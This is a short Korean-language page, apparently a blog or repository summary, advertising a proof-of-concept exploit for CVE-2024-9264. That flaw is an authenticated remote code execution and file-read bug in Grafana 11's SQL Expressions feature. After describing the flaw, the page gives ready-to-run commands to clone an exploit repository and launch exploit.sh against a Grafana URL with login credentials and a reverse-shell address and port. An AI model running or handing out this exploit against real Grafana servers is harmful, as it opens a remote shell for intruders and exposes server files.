
Grafana (v11.0)에서 SQL Expressions를 통한 인증된 RCE - PoC Exploit
Grafana(v11.0) SQL Expressions를 통한 인증된 RCE - PoC 익스플로잇
CVE-2024-9264 - Grafana v11.0
인증된 원격 코드 실행 (RCE)
PoC
CVE-2024-9264는 Grafana 11의 실험적 “SQL Expressions” 기능에서 도입된 심각한 원격 코드 실행 및 로컬 파일 포함 취약점입니다. API는 사용자 제공 SQL을 적절한 검증 없이 DuckDB CLI로 직접 전달하므로, Viewer 이상의 권한을 가진 인증된 계정은 duckdb 바이너리가 서버의 PATH에 있는 한 셸 명령을 주입하거나 임의의 파일을 읽을 수 있습니다.
git clone https://github.com/rvizx/CVE-2024-9264
cd CVE-2024-9264
chmod +x exploit.sh
# usage
usage: ./exploit.sh <grafana_url> <username> <password> <reverse_ip> <reverse_port>
예시:
./exploit.sh http://grafana.example.com admin LMCOP4X2?29DX2%332! 10.10.10.10 1337